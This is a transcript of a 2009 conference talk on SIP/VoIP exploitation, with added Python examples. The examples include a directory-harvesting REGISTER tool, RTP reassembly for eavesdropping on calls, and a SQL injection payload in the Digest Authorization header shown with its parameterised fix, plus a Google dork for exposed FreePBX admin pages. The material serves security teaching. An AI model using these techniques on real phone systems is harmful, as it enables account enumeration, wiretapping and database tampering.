Slide 1 - IL Hack Institute (transcript)

SIP Tactics && Exploitation
ILHACK 2009
By Jacky Altal and Yossef Cohen
About us – Jacky 4lt4l
Professional Experience:
• Two years as a security and data communication expert at a local company.
• Six years as a software developer and security consultant at a local biotech company.
• Hacking Defined leading instructor – Technion CISO/SECPROF programs.
Specializing in:
• Penetration Testing
• Vulnerability Research
• Forensics Investigations
TOC
1. VoIP – The Real World
2. VoIP – Know Your Environment
3. VoIP – Security Threats
4. VoIP – Lab
5. VoIP – Q&A
1. VoIP – Reality
Why do we ask these questions?
According to Emerging Cyber Threats for 2009 (Georgia Tech Information Security Center),
more than 75 percent of corporate phone lines will be using Voice over IP
(VoIP) within the next two years.
“From the outset, VoIP infrastructure has been vulnerable to the same types of
attacks that plague other networked computing architectures. When voice is
digitized, encoded, compressed into packets and exchanged over IP networks, it
is susceptible to misuse. Cyber criminals will be drawn to the VoIP medium to
engage in voice fraud, data theft and other scams—similar to the problems
email has experienced. Denial of service, remote code execution and botnets all
apply to VoIP networks, and will become more problematic for mobile devices
as well.” (Emerging Cyber Threats for 2009, Georgia Tech Information
Security Center)
“VoIP is about convergence. The idea is that you save money and
resources and time.” (Next Generation Security)
Because VoIP carries telephone calls over the Internet, it inherits the
Internet's weaknesses.
Many incumbent telecommunication carriers have started offering VoIP.
The security aspect, or the lack of it, is misunderstood by some of the
VoIP service providers, local providers included. I'm n0t smiling...
(Image slides: VoIP – Reality; VoIP – Home)
About us – Yossef Cohen (SIPM4ST3R)
Professional Experience:
• 10 years of experience in the telecom market working for Amdocs Israel,
the last 3 years as Integration Manager for projects such as Sprint 4G, AT&T and
BMCC China.
• Founder of MaxxVoice.com, developed during a sabbatical year in
2006.
Specializing in:
• Penetration Testing
• Vulnerability Research
• Forensics Investigations
2. VoIP – Know Your Environment
VoIP
• VoIP: Voice over Internet Protocol
– Phone calls carried over IP networks, including the public Internet
– Used through softphones, IP phones or analogue telephone adapters (ATAs)
– Supports QoS
– Supports several audio codecs
SIP
• SIP: Session Initiation Protocol (RFC 3261)
– Used for signaling: setting up, modifying and tearing down sessions
– Supports audio and video sessions (the media itself is described by the SDP body)
– Runs over UDP or TCP
– Default port 5060 (5061 for SIP over TLS)
– Text-based protocol, like SMTP and HTTP
RTP
• RTP: Real-time Transport Protocol (RFC 3550)
– Carries the voice (and video) payload
– Runs over UDP
– Ports are dynamic: each call's media port is negotiated in the SDP carried by the SIP signaling, so there is no fixed port to filter on
• RTCP: RTP Control Protocol
– Controls and monitors the media stream (loss, jitter, round-trip time); by convention it uses the RTP port + 1
Addressing
• A SIP address (URI) looks like an e-mail address, in the pattern:
– sip:<user | phone number>@<domain | hostname | IP address>
• Some examples:
– [email protected][email protected]
SIP Signaling
(Call-flow diagram: INVITE → 180 Ringing → 200 OK → ACK → RTP media → BYE → 200 OK)
• INVITE from caller
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 192.168.0.204:5060;rport;branch=z9hG4bK42ccbc6905
From: <sip:[email protected]>;tag=33a31c9c
To: <sip:[email protected]>
Call-ID: [email protected]
Contact: <sip:[email protected]:5060>
CSeq: 801 INVITE
Max-Forwards: 70
Allow: INVITE,CANCEL,ACK,BYE,NOTIFY,REFER,OPTIONS,INFO,MESSAGE
Content-Type: application/sdp
User-Agent: Nologo
Content-Length: 429
• Ringing
<--- SIP read from 192.168.5.15:5060 --->
SIP/2.0 180 Ringing
Via: SIP/2.0/UDP 192.168.0.201:5060;branch=z9hG4bK565267b5
From: <sip:[email protected]>;tag=as23f90079
To: <sip:[email protected];user=phone>;tag=419b9912cbfa34b2
Call-ID: [email protected]
CSeq: 102 INVITE
User-Agent: Grandstream HT488 1.0.3.64 FXS
Content-Length: 0
• 200 OK from the called peer (answered); its SDP body carries the callee's media address and RTP port
<--- SIP read from 192.168.5.10:5060 --->
SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.5.10:5060;rport;branch=z9hG4bK62b65b4f29;received=192.168.5.10
From: <sip:[email protected]>;tag=1983eb6f
To: <sip:[email protected]>;tag=as36a497bc
Call-ID: [email protected]
CSeq: 802 INVITE
User-Agent: SIPM4ST3R
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Contact: <sip:[email protected]>
Content-Type: application/sdp
Content-Length: 264
• ACK from the caller completes the INVITE transaction; with both SDP descriptions exchanged, the RTP session starts
<--- SIP read from 192.168.5.10:5060 --->
ACK sip:[email protected];user=phone SIP/2.0
Via: SIP/2.0/UDP 192.168.0.201:5060;branch=z9hG4bK384d1e7a
From: <sip:[email protected]>;tag=as23f90079
To: <sip:[email protected];user=phone>;tag=419b9912cbfa34b2
Contact: <sip:[email protected]>
Call-ID: [email protected]
CSeq: 102 ACK
User-Agent: SIPM4ST3R
Max-Forwards: 70
Content-Length: 0
• BYE from the called peer (hang-up)
<--- SIP read from 192.168.5.15:5060 --->
BYE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 192.168.0.202;branch=z9hG4bKbcb6e24514450a48
From: <sip:[email protected];user=phone>;tag=2efac6b2150259f8
To: <sip:[email protected]>;tag=as1ca51ab9
Call-ID: [email protected]
CSeq: 33409 BYE
User-Agent: Grandstream HT488 1.0.3.64 FXS
Max-Forwards: 70
Allow: INVITE,ACK,CANCEL,BYE,NOTIFY,REFER,OPTIONS,INFO,SUBSCRIBE
Content-Length: 0
• 200 OK answering the BYE (note CSeq 102 BYE); the dialog is now terminated
<--- SIP read from 192.168.5.10:5060 --->
SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.0.201:5060;branch=z9hG4bK099b03fe
From: <sip:[email protected]>;tag=as36a497bc
To: <sip:[email protected]>;tag=1983eb6f
Call-ID: [email protected]
CSeq: 102 BYE
Content-Length: 0
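The slides above show messages from more than one call (compare the CSeq numbers and Via hosts). The block below is an added example, not code from the talk or from SIPy: it builds one consistent INVITE → 180 → 200 → ACK → BYE → 200 exchange between two made-up endpoints (192.168.5.10 and 192.168.5.15; the tags aaa1/bbb2, Call-ID and media ports are assumptions) and tracks the dialog the way a proxy, SBC or IDS would. Call-ID plus the From and To tags identify the dialog, the ACK's CSeq must match the INVITE, the media port is read from the SDP in the 200 OK, and a BYE whose tags are not the dialog's own is rejected, which is what stops an off-path attacker who guesses a Call-ID from tearing the call down.

```python
"""SIP dialog walk-through: parse each message of an INVITE/180/200/ACK/BYE/200 exchange
and track the dialog (Call-ID + From/To tags, CSeq, SDP media port)."""
import re

# Constructed exchange between two hypothetical endpoints; addresses, tags and branch
# IDs are made up for this example (not a capture from the talk).
ALICE, BOB = "192.168.5.10", "192.168.5.15"
CALL_ID = "c0ffee1234@" + ALICE
A_FROM = f"<sip:1001@{ALICE}>;tag=aaa1"
B_TO_NO_TAG = f"<sip:2001@{BOB}>"
B_TO = B_TO_NO_TAG + ";tag=bbb2"          # the callee adds its tag in its first response


def sdp(host, port):
    """Minimal SDP advertising one G.711 audio stream on a dynamic port."""
    return (f"v=0\r\no=- 1 1 IN IP4 {host}\r\ns=-\r\nc=IN IP4 {host}\r\nt=0 0\r\n"
            f"m=audio {port} RTP/AVP 0\r\na=rtpmap:0 PCMU/8000\r\n")


def build(start_line, headers, body=""):
    """Serialise a SIP message; Content-Length is computed, never hand-typed."""
    hdrs = list(headers) + [("Content-Length", str(len(body.encode())))]
    return start_line + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in hdrs) + "\r\n" + body


def common(frm, to, cseq, via_host):
    """Headers shared by every message; the Via branch is unique per transaction."""
    return [("Via", f"SIP/2.0/UDP {via_host}:5060;rport;branch=z9hG4bK{cseq.replace(' ', '')}"),
            ("From", frm), ("To", to), ("Call-ID", CALL_ID), ("CSeq", cseq), ("Max-Forwards", "70")]


EXCHANGE = [
    build(f"INVITE sip:2001@{BOB} SIP/2.0", common(A_FROM, B_TO_NO_TAG, "101 INVITE", ALICE)
          + [("Contact", f"<sip:1001@{ALICE}:5060>"), ("Content-Type", "application/sdp")],
          sdp(ALICE, 16384)),
    build("SIP/2.0 180 Ringing", common(A_FROM, B_TO, "101 INVITE", ALICE)),
    build("SIP/2.0 200 OK", common(A_FROM, B_TO, "101 INVITE", ALICE)
          + [("Contact", f"<sip:2001@{BOB}:5060>"), ("Content-Type", "application/sdp")],
          sdp(BOB, 23456)),
    build(f"ACK sip:2001@{BOB} SIP/2.0", common(A_FROM, B_TO, "101 ACK", ALICE)),
    build(f"BYE sip:1001@{ALICE} SIP/2.0", common(B_TO, A_FROM, "7 BYE", BOB)),   # callee hangs up
    build("SIP/2.0 200 OK", common(B_TO, A_FROM, "7 BYE", BOB)),
]


def tag_of(header_value):
    m = re.search(r";tag=([^;>\s]+)", header_value)
    return m.group(1) if m else None


def parse(raw):
    """Split a SIP message into start line, headers (lower-cased names -> list of values) and body."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    cseq_num, cseq_method = headers["cseq"][0].split()
    msg = {"body": body, "headers": headers, "call_id": headers["call-id"][0],
           "cseq_num": int(cseq_num), "cseq_method": cseq_method,
           "from_tag": tag_of(headers["from"][0]), "to_tag": tag_of(headers["to"][0])}
    if start.startswith("SIP/2.0 "):
        msg.update(kind="response", status=int(start.split()[1]))
    else:
        msg.update(kind="request", method=start.split()[0])
    return msg


def sdp_media_port(body):
    for line in body.splitlines():
        if line.startswith("m=audio "):
            return int(line.split()[1])
    return None


class Dialog:
    """State machine for one dialog. A BYE is honoured only when its From/To tags are the
    dialog's own; knowing the Call-ID alone is not enough to tear the call down."""

    def __init__(self):
        self.state, self.call_id, self.tags = "idle", None, set()
        self.invite_cseq, self.media_port = None, None

    def feed(self, raw):
        m = parse(raw)
        if self.call_id is None:
            self.call_id = m["call_id"]
        elif m["call_id"] != self.call_id:
            raise ValueError("Call-ID does not belong to this dialog")
        if m["kind"] == "request" and m["method"] == "INVITE":
            self.invite_cseq, self.state = m["cseq_num"], "invited"
            self.tags.add(m["from_tag"])
        elif m["kind"] == "response" and m["cseq_method"] == "INVITE":
            self.tags.add(m["to_tag"])            # callee's tag completes the dialog ID
            if m["status"] == 180:
                self.state = "ringing"
            elif m["status"] == 200:
                self.media_port, self.state = sdp_media_port(m["body"]), "answered"
        elif m["kind"] == "request" and m["method"] == "ACK":
            if m["cseq_num"] != self.invite_cseq:
                raise ValueError("ACK CSeq must match the INVITE it acknowledges")
            self.state = "confirmed"              # RTP flows from here on
        elif m["kind"] == "request" and m["method"] == "BYE":
            if {m["from_tag"], m["to_tag"]} != self.tags:
                raise ValueError("BYE with foreign tags rejected")
            self.state = "terminating"
        elif m["kind"] == "response" and m["cseq_method"] == "BYE" and m["status"] == 200:
            self.state = "terminated"
        return self.state


def walk(messages):
    """Feed a whole exchange; return the sequence of dialog states and the final Dialog."""
    d = Dialog()
    return [d.feed(m) for m in messages], d
```

Running `walk(EXCHANGE)` yields the states invited, ringing, answered, confirmed, terminating, terminated, with the media port 23456 taken from the callee's SDP; feeding a BYE with a made-up tag into a confirmed dialog raises instead of terminating it.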
3. VoIP – Security Threats
Attacks by layer:

Layer        | Attacks
-------------|---------------------------------------------------------------
Network      | Physical attack, ARP cache poisoning, ARP flood, MAC spoofing
Internet     | IP spoofing, redirect via IP, IP fragmentation spoofing
Transport    | TCP/UDP flood, TCP/UDP replay
Application  | TFTP insertion, DHCP insertion, RTP tampering
Unblock the Blocker – Kevin Mitnick
Google dork:
intext:"FreePBX Administration" + "Welcome" inurl:Admin
Default Trixbox VoIP servers: default passwords, vulnerable servers.
Directory Harvesting
VoIP directory harvesting attacks occur when attackers try to find valid VoIP
addresses by brute force. The attacker sends requests (REGISTER, OPTIONS or INVITE)
for thousands of candidate addresses to a VoIP domain; the addresses that are not
rejected (for example, those answered with an authentication challenge rather than
404 Not Found) are valid VoIP accounts.
(Speaker note: add a screenshot of a port 5060 scan from the laptop here.)
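Added example, not the talk's SIPy or any other existing tool: a REGISTER-based harvester with a pluggable transport. The default transport is a constructed in-process registrar that challenges known users with 401 and answers 404 to unknown ones; the user list, domain and source address are made up. Against a live PBX the transport would be a UDP socket to port 5060 returning the raw reply.

```python
"""Directory harvesting against a SIP registrar: send a REGISTER per candidate user and
classify the reply. The transport is pluggable; the default is an in-process stand-in for
a PBX so the example runs offline."""
import random
import re

# Hypothetical registrar behaviour constructed for this example: known users are
# challenged (401), unknown ones rejected (404). That difference is the leak.
KNOWN_USERS = {"100", "101", "200", "asterisk"}


def fake_registrar(request: bytes) -> bytes:
    """Stand-in for a UDP round trip to port 5060 (replace with sendto/recvfrom)."""
    text = request.decode()
    user = re.search(r"^To: <sip:([^@>]+)@", text, re.M).group(1)
    via = re.search(r"^Via: (.*)$", text, re.M).group(1)
    cseq = re.search(r"^CSeq: (.*)$", text, re.M).group(1)
    if user in KNOWN_USERS:
        status = "401 Unauthorized"
        extra = 'WWW-Authenticate: Digest realm="asterisk", nonce="0123abcd"\r\n'
    else:
        status, extra = "404 Not Found", ""
    return f"SIP/2.0 {status}\r\nVia: {via}\r\nCSeq: {cseq}\r\n{extra}Content-Length: 0\r\n\r\n".encode()


def register_request(user, domain, src="192.168.5.99"):
    """Build a bare REGISTER; branch, From tag and Call-ID must be fresh per request."""
    def rnd():
        return f"{random.getrandbits(32):08x}"
    return (f"REGISTER sip:{domain} SIP/2.0\r\n"
            f"Via: SIP/2.0/UDP {src}:5060;branch=z9hG4bK{rnd()};rport\r\n"
            f"From: <sip:{user}@{domain}>;tag={rnd()}\r\n"
            f"To: <sip:{user}@{domain}>\r\n"
            f"Call-ID: {rnd()}@{src}\r\n"
            "CSeq: 1 REGISTER\r\n"
            f"Contact: <sip:{user}@{src}:5060>\r\n"
            "Max-Forwards: 70\r\nExpires: 60\r\nContent-Length: 0\r\n\r\n").encode()


def status_code(response: bytes) -> int:
    return int(response.decode().split("\r\n", 1)[0].split()[1])


def classify(code):
    """Map the registrar's status code to a verdict about the user name."""
    if code in (401, 407):
        return "exists"                     # challenged: the account is known
    if code == 200:
        return "exists, registered without authentication"
    if code in (403, 404):
        return "absent"
    return f"unknown ({code})"


def harvest(candidates, domain, transport=fake_registrar):
    """Return {user: verdict} for every candidate."""
    return {u: classify(status_code(transport(register_request(u, domain)))) for u in candidates}


def candidate_list(lo=100, hi=110, words=("admin", "asterisk", "operator")):
    """Numeric extension range plus a short word list, as a harvesting tool would generate."""
    return [str(n) for n in range(lo, hi)] + list(words)
```

The mapping in `classify()` is the one this constructed registrar leaks; real PBXs differ, and a registrar that answers every REGISTER identically (for Asterisk, `alwaysauthreject=yes` in sip.conf) removes the signal this technique depends on.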
Eavesdropping
Voice packets are subject to man-in-the-middle attacks: the attacker poisons the ARP
caches of the two parties (answering for each party's IP address with the attacker's MAC)
so that the VoIP packets flow through the attacker's system. The attacker can then:
• Reassemble the RTP voice packets
• Listen in to conversations in real time
The same position also exposes all sorts of sensitive data, such as
user names, passwords (SIP Digest challenges and responses) and VoIP system information.
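Once the RTP is flowing through the attacker's machine, reassembly is header parsing and reordering. The block below is an added example (not code from the talk): it parses the RTP fixed header from RFC 3550, skips RTCP packets that share the port, unwraps the 16-bit sequence number across the 65535 → 0 boundary, counts loss and concatenates each SSRC's payload. The capture is constructed inline (two made-up SSRCs, 8-byte stand-ins for G.711 frames), and the block also illustrates the RTP/RTCP section above.

```python
"""RTP reassembly from captured packets: parse the fixed header (RFC 3550), drop RTCP that
shares the port, group by SSRC, order by unwrapped sequence number and concatenate the
payloads so each direction of the call can be played back."""
import struct


def parse_rtp(pkt: bytes):
    """Return header fields and payload, or None for RTCP (PT 72-76 with the marker bit set)."""
    if len(pkt) < 12:
        raise ValueError("short packet")
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", pkt[:12])
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    pt = b1 & 0x7F
    if 72 <= pt <= 76:            # RTCP SR/RR/SDES/BYE/APP (PT 200-204) look like marked RTP
        return None
    cc, has_ext, padded = b0 & 0x0F, b0 & 0x10, b0 & 0x20
    offset = 12 + 4 * cc          # skip CSRC list
    if has_ext:
        ext_len = struct.unpack("!H", pkt[offset + 2:offset + 4])[0]
        offset += 4 + 4 * ext_len
    end = len(pkt) - (pkt[-1] if padded else 0)   # last byte holds the padding length
    return {"pt": pt, "seq": seq, "ts": ts, "ssrc": ssrc, "marker": bool(b1 & 0x80),
            "payload": pkt[offset:end]}


def build_rtp(seq, ts, ssrc, payload, pt=0, marker=False):
    """Minimal RTP packet (V=2, no CSRC/extension/padding); used to construct the sample capture."""
    return struct.pack("!BBHII", 0x80, (0x80 if marker else 0) | pt, seq & 0xFFFF,
                       ts & 0xFFFFFFFF, ssrc) + payload


def extended_sequence(seqs):
    """Unwrap 16-bit sequence numbers (RFC 3550 A.1 style) so ordering survives 65535 -> 0."""
    cycles, max_seq, out = 0, seqs[0], []
    for seq in seqs:
        delta = (seq - max_seq) & 0xFFFF
        if delta < 0x8000:                      # in order, or a jump ahead
            if seq < max_seq:
                cycles += 0x10000               # wrapped around
            max_seq = seq
            out.append(cycles + seq)
        else:                                   # late, reordered packet
            out.append(cycles + seq - (0x10000 if seq > max_seq else 0))
    return out


def reassemble(packets):
    """{ssrc: {"pt", "packets", "lost", "audio"}} with payloads in sequence order."""
    streams = {}
    for pkt in packets:
        r = parse_rtp(pkt)
        if r is not None:
            streams.setdefault(r["ssrc"], []).append(r)
    result = {}
    for ssrc, pkts in streams.items():
        ext = extended_sequence([p["seq"] for p in pkts])
        ordered = [p for _, p in sorted(zip(ext, pkts), key=lambda t: t[0])]
        span = max(ext) - min(ext) + 1
        result[ssrc] = {"pt": pkts[0]["pt"], "packets": len(pkts), "lost": span - len(pkts),
                        "audio": b"".join(p["payload"] for p in ordered)}
    return result


def g711_chunk(seq):
    """Constructed 8-byte stand-in for a 20 ms G.711 frame (real frames are 160 bytes)."""
    return bytes([(seq * 37) & 0xFF]) * 8


# Constructed capture: Alice (SSRC 0x11111111) wraps 65534 -> 0, one packet arrives late and
# seq 1 is lost; Bob (SSRC 0x22222222) is clean; one RTCP sender report is interleaved.
RTCP_SR = struct.pack("!BBHII", 0x80, 200, 6, 0x11111111, 0) + b"\x00" * 20
CAPTURE = ([build_rtp(s, s * 160, 0x11111111, g711_chunk(s), marker=(s == 65534))
            for s in (65534, 0, 65535, 2)]
           + [build_rtp(s, s * 160, 0x22222222, g711_chunk(s)) for s in (10, 11, 12)]
           + [RTCP_SR])
```

Feed `reassemble()` the UDP payloads pulled out of a pcap. For payload type 0 the resulting bytes are raw µ-law at 8 kHz, which `sox -t ul -r 8000 -c 1 alice.raw alice.wav` turns into a playable file; the `lost` counter tells you how much of the conversation the tap actually captured.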
SQL injection and password guessing can be launched in a distributed fashion, from many
sources and with different SIP URIs, so blocking a single source does not stop them.
SQL injection via the SIP Authorization header
The Authorization: Digest header can be tampered with to inject a SQL query. In the
slide's example the username field carries an UPDATE against the subscriber table,
and the trailing -- comments out the remainder of the server's own query:
UPDATE subscriber SET first_name='jacky_altal' WHERE username='asterisk'--,
realm="192.168.10.100", algorithm="md5",
nonce="41351a34b342b43434d223421d",
response="a6466dce7890e087e6e55e67e2ee3"
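An added example, not code from the talk or from any PBX: a subscriber lookup that splices Digest header fields into SQL, next to the parameterised version, with the slide's payload carried in the username field. The leading `asterisk';` in the payload and the stacked-statement emulation are assumptions (the slide shows only the injected fragment, and SQLite by itself refuses more than one statement per call); the table, password and HA1 are constructed.

```python
"""SQL injection through the Digest Authorization header: a PBX that splices the Digest
username into its subscriber lookup, beside the parameterised fix. Uses an in-memory
SQLite 'subscriber' table constructed for this example."""
import hashlib
import re
import sqlite3

# The slide's injected fragment placed in the username field. The leading "asterisk';" is
# an assumption about the part of the header the slide does not show.
TAMPERED_AUTH = (
    "Digest username=\"asterisk'; UPDATE subscriber SET first_name='jacky_altal' "
    "WHERE username='asterisk'--\", realm=\"192.168.10.100\", algorithm=\"md5\", "
    "nonce=\"41351a34b342b43434d223421d\", response=\"a6466dce7890e087e6e55e67e2ee3\""
)


def parse_digest(header):
    """Parse 'Digest k="v", k=v, ...' into a dict; quoted values may contain spaces and commas."""
    scheme, _, params = header.partition(" ")
    if scheme != "Digest":
        raise ValueError("not a Digest header")
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in re.finditer(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', params)}


def fresh_db():
    """Constructed subscriber table: one account, HA1 = md5(user:realm:password)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscriber (username TEXT, domain TEXT, first_name TEXT, ha1 TEXT)")
    ha1 = hashlib.md5(b"asterisk:192.168.10.100:s3cret").hexdigest()
    conn.execute("INSERT INTO subscriber VALUES (?, ?, ?, ?)",
                 ("asterisk", "192.168.10.100", "pbx", ha1))
    conn.commit()
    return conn


def run_stacked(conn, sql):
    """Emulates a driver in multi-statement mode (MySQL with CLIENT_MULTI_STATEMENTS behaves
    this way). SQLite's execute() refuses stacked statements, so the string is split on ';'
    here; returns the rows of the first SELECT."""
    rows = None
    for stmt in sql.split(";"):
        if stmt.strip():
            cur = conn.execute(stmt)
            if rows is None and stmt.lstrip().upper().startswith("SELECT"):
                rows = cur.fetchall()
    conn.commit()
    return rows or []


def lookup_vulnerable(conn, auth_header):
    """Splices attacker-controlled header fields straight into the query text."""
    p = parse_digest(auth_header)
    sql = ("SELECT username, ha1 FROM subscriber WHERE username = '%s' AND domain = '%s'"
           % (p["username"], p["realm"]))
    return run_stacked(conn, sql)


def lookup_safe(conn, auth_header):
    """Bound parameters: the whole username value is a literal, however it is spelled."""
    p = parse_digest(auth_header)
    return conn.execute("SELECT username, ha1 FROM subscriber WHERE username = ? AND domain = ?",
                        (p["username"], p["realm"])).fetchall()


def first_name(conn, user):
    return conn.execute("SELECT first_name FROM subscriber WHERE username = ?", (user,)).fetchone()[0]


def digest_response(ha1, method, uri, nonce):
    """RFC 2617 response without qop: md5(HA1:nonce:md5(method:uri))."""
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()


def legit_auth(user, realm, password, nonce, uri, method="REGISTER"):
    """What a well-behaved client sends back after a 401 challenge."""
    ha1 = hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()
    resp = digest_response(ha1, method, uri, nonce)
    return (f'Digest username="{user}", realm="{realm}", nonce="{nonce}", uri="{uri}", '
            f'algorithm="md5", response="{resp}"')


def authenticate(conn, auth_header, method="REGISTER", lookup=lookup_safe):
    """Full check: look the user up (safely by default) and compare the Digest response."""
    p = parse_digest(auth_header)
    rows = lookup(conn, auth_header)
    if not rows:
        return False
    return digest_response(rows[0][1], method, p.get("uri", ""), p["nonce"]) == p["response"]
```

With `lookup_vulnerable` the slide's header rewrites the subscriber row (first_name becomes jacky_altal) before the password is ever checked; with `lookup_safe` the same header simply matches no user and the row is untouched.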
Invite of Death Attack
The Invite of Death attack demonstrates that VoIP is affected by exactly the
same types of vulnerabilities as any other IP application: a single malformed INVITE
hits an implementation error that leaves the application open to a remote denial of
service. This particular vulnerability has already been fixed, but there are many more
to come.
In other words, if you rely on a generic firewall to protect your voice
system, the chances are that it will neither block nor even detect these threats: the
malformed INVITE is still an ordinary UDP packet to port 5060.
SIPy – sends spoofed calls to a SIP client (the "SIP client killer")
Written by Jacky Altal and Yossef Cohen
SIPy – SIP software testing
SIPy – SIP server/client vulnerability testing
SIP Relay Attack (diagram): the attacker sends a modified request to the proxy, which relays it to the victim; the reverse request passes back through the proxy, and the relay ends in an out-dial.
Are you R-E-A-D-Y??? Let's F-I-G-H-T!!!
4. VoIP – Lab
CentOS – Linux distribution
http://www.centos.org/
Asterisk – open source PBX http://www.asterisk.org/
X-Lite – SIP client
iPhone SIP client (home made)
Of course there are many other codecs and components...
iWar – 012 ;) network range mass scanning
We can find other lines and
scan network ranges, by
IP addresses and phone numbers:
find free X.25 networks,
free sex lines,
http://www.softwink.com/iwar/
Encryption: what is it good for?
Provisioning servers
しかたがない (Shikata ga nai, "it cannot be helped")...
5. Q&A: Question? > /dev/null
The End
[email protected] [email protected]
http://4lt4l.blogspot.com